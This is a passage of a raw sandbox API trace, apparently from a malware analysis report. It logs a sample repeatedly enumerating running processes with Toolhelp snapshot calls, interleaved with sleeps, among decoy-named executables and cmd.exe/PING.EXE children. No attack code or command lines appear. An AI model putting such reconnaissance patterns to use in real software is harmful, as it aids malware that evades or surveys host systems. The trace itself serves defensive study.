lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0100.523] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0100.524] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0100.525] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0100.527] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0100.528] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0100.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0100.530] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0100.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0100.532] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0100.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0100.534] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0100.536] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0100.537] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0100.538] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0100.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0100.540] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0100.608] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0100.609] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.611] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0100.612] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0100.613] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.614] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xafc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0100.616] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0100.617] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.618] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0100.619] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.621] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0100.622] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.623] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0100.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.625] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb88, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0100.626] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb68, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0100.627] CloseHandle (hObject=0xbc) returned 1 [0100.627] Sleep (dwMilliseconds=0x12c) [0100.947] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0100.952] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.953] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0100.953] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0100.954] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.955] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0100.955] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.956] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0100.957] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0100.957] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0100.958] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0100.959] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.959] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.961] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.961] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.962] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0100.963] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.963] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.964] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0100.965] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.966] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.967] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0100.969] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0100.970] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0100.971] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.972] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.973] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0100.974] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0100.976] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0100.977] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0100.978] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0100.979] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0100.980] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0100.981] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0100.982] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0100.983] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0101.026] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0101.027] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0101.029] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0101.030] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0101.032] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0101.033] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0101.035] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0101.036] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0101.037] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0101.039] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.040] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.041] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0101.043] CloseHandle (hObject=0xc4) returned 1 [0101.043] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0101.049] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, 